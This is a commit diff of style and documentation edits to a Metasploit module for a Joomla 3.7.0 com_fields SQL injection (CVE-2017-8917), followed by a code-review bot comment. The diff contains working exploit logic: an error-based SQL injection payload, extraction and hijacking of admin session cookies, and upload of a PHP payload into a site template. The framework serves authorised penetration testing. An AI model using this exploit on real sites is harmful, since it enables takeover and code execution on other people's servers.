Changes suggested by h00die

GSoC/Meterpreter_Web_Console
Luis Hernandez 2018-03-08 20:13:01 -05:00
parent 05a653b853
commit 048d0d1fe4
2 changed files with 14 additions and 15 deletions


@ -1,7 +1,7 @@
## Vulnerable Application ## Vulnerable Application
This module exploits a sql injection in the core of Joomla 3.7.0. This module exploits a SQL Injection vulnerability in the com_fields component which was introduced to the core of Joomla in version 3.7.0.
This vulnerability can allow remote code execution. With the SQLi, its possible to enumerate cookies of administrative users, and hijack one of their sessions. If no administrators are authenticated, the RCE portion will not work. If a session hijack is available, one of the website templates is identified, and our payload is added to the template as a new file, and then executed.
## Verification ## Verification
@ -15,7 +15,7 @@
## Scenarios ## Scenarios
### Joomal 3.7.0 and an administrator must be authenticated in the backend ### Joomal 3.7.0 on Ubuntu 16.04 with another user authenticated as an administrator
``` ```
msf > use exploit/unix/webapp/joomla_comfields_sqli_rce msf > use exploit/unix/webapp/joomla_comfields_sqli_rce


@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => "Joomla Component Fields SQLi Remote Code Execution", 'Name' => 'Joomla Component Fields SQLi Remote Code Execution',
'Description' => %q{ 'Description' => %q{
This module exploits a SQL injection vulnerability found in Joomla versions This module exploits a SQL injection vulnerability found in Joomla versions
3.7.0. 3.7.0.
@ -25,6 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
'References' => 'References' =>
[ [
[ 'CVE', '2017-8917' ], # SQLi [ 'CVE', '2017-8917' ], # SQLi
['EDB', '42033'],
[ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ] [ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ]
], ],
'Payload' => 'Payload' =>
@ -38,10 +39,10 @@ class MetasploitModule < Msf::Exploit::Remote
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,
'Targets' => 'Targets' =>
[ [
[ 'Joomla 3.7.0 ', {} ] [ 'Joomla 3.7.0', {} ]
], ],
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => "May 17 2017", 'DisclosureDate' => 'May 17 2017',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options( register_options(
@ -68,9 +69,8 @@ class MetasploitModule < Msf::Exploit::Remote
def sqli( tableprefix , option) def sqli( tableprefix , option)
# SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in). # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
# The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history. # The extra search for userid!=0 is because of our SQL data that's inserted in the session cookie history.
# This way we make sure that's excluded and we only get real admin sessions. # This way we make sure that's excluded and we only get real admin sessions.
if option == 'check' if option == 'check'
sql = "(UPDATEXML(2170,CONCAT(0x2e,0x7170716a71,(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x7171717171),4879))" sql = "(UPDATEXML(2170,CONCAT(0x2e,0x7170716a71,(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x7171717171),4879))"
else else
@ -88,7 +88,6 @@ class MetasploitModule < Msf::Exploit::Remote
} }
}) })
return res return res
end end
@ -110,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Retrieve the admin session using our retrieved table prefix # Retrieve the admin session using our retrieved table prefix
res = sqli("#{table_prefix}_", 'exploit') res = sqli("#{table_prefix}_", 'exploit')
if res && res.code == 500 && res.body =~ /qqq(.*)qqq/ if res && res.code == 500 && res.body =~ /qqq(.*)qqq/
auth_cookie_part = $1 auth_cookie_part = $1
print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]") print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
@ -133,14 +132,14 @@ class MetasploitModule < Msf::Exploit::Remote
# Modify cookie to authenticated admin # Modify cookie to authenticated admin
auth_cookie = cookie_begin auth_cookie = cookie_begin
auth_cookie << "=" auth_cookie << '='
auth_cookie << auth_cookie_part auth_cookie << auth_cookie_part
auth_cookie << ";" auth_cookie << ';'
# Authenticated session # Authenticated session
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
'cookie' => auth_cookie 'cookie' => auth_cookie
}) })
@ -154,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Retrieve template view # Retrieve template view
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
'cookie' => auth_cookie, 'cookie' => auth_cookie,
'vars_get' => { 'vars_get' => {
'option' => 'com_templates', 'option' => 'com_templates',
@ -183,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("#{peer} - Creating file [ #(unknown).php ]") print_status("#{peer} - Creating file [ #(unknown).php ]")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
'cookie' => auth_cookie, 'cookie' => auth_cookie,
'vars_get' => { 'vars_get' => {
'option' => 'com_templates', 'option' => 'com_templates',
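Review bot: In the `@ -133,14 +132,14 @@` hunk, `auth_cookie = cookie_begin` followed by `auth_cookie << '='` aliases rather than copies, so the three `<<` calls mutate the very object `cookie_begin` refers to; that is harmless only if `cookie_begin` is never read again afterwards, which cannot be confirmed from the hunk because the enclosing method starts and ends outside it. Building the value with interpolation removes the aliasing and keeps working if a `# frozen_string_literal: true` magic comment is added later: `auth_cookie = "#{cookie_begin}=#{auth_cookie_part};"`. Since the commit is a quoting-style pass, the capture at `auth_cookie_part = $1` in the `@ -110,7 +109,7 @@` hunk could get the same treatment, `auth_cookie_part = Regexp.last_match(1)`, or a named capture such as `/qqq(?<part>.*)qqq/` read back with `Regexp.last_match[:part]`, which is clearer than the bare global. The signature `def sqli( tableprefix , option)` in the `@ -68,9 +69,8 @@` hunk likewise still carries stray spaces inside the parentheses; `def sqli(tableprefix, option)` matches the style the rest of the change moves toward.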